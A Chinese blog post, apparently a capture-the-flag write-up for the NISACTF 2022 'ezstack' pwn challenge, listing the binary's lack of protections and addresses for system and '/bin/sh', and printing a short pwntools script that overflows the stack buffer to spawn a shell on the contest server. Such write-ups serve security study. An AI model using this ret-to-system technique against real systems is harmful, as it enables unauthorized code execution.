AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

[NISACTF 2022]ezstack-入土为安的第十四天

2024-08-19 26
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: [NISACTF 2022]ezstack-入土为安的第十四天

签到题吧

checksec pwn  没有保护

进入main函数,点进shell ,buf 88808048buf

system 08048512

'/bin/sh 0804A024

直接让代码溢出调用system和/bin/sh

from pwn import *
# 连接到远程服务
p = remote('node5.anna.nssctf.cn', 20789)
# 构造 payload
payload = b'a' * (0x48 + 0x4) + p32(0x08048512) + p32(0x804A024)
# 发送 payload
p.sendlineafter('NISACTF', payload)
# 进入交互模式
p.interactive()

文章标签:
Shell
丸卜
目录
相关文章
丸卜
|
2月前
|
安全
babystack2.0-入土为安的第十六天
babystack2.0-入土为安的第十六天
丸卜
31 0
丸卜
|
2月前
[LitCTF 2023]debase64-入土为安的第十八天
[LitCTF 2023]debase64-入土为安的第十八天
丸卜
30 0
丸卜
|
2月前
|
算法
[MoeCTF 2022]Art 入土为安的第四天
[MoeCTF 2022]Art 入土为安的第四天
丸卜
30 1
丸卜
|
2月前
|
Python
[NISACTF 2022]ezpython入土为安的第二十一天
[NISACTF 2022]ezpython入土为安的第二十一天
丸卜
31 0
丸卜
|
2月前
|
Shell
[NISACTF 2022]ezpie- 入土为安的第十五天
[NISACTF 2022]ezpie- 入土为安的第十五天
丸卜
30 0
丸卜
|
2月前
|
Python
[MoeCTF 2022]EquationPy-入土为安的第十九天
[MoeCTF 2022]EquationPy-入土为安的第十九天
丸卜
34 0
丸卜
|
2月前
|
安全
[MoeCTF 2022]babyfmt-入土为安的第十九天
[MoeCTF 2022]babyfmt-入土为安的第十九天
丸卜
33 0
丸卜
|
2月前
signin-入土为安的第十九天
signin-入土为安的第十九天
丸卜
40 0
丸卜
|
2月前
[MoeCTF 2022]ezTea-入土为安的第十九天
[MoeCTF 2022]ezTea-入土为安的第十九天
丸卜
29 0
丸卜
|
2月前
|
Shell
[SWPUCTF 2021 新生赛]gift_pwn-入土为安的第十五天
[SWPUCTF 2021 新生赛]gift_pwn-入土为安的第十五天
丸卜
69 0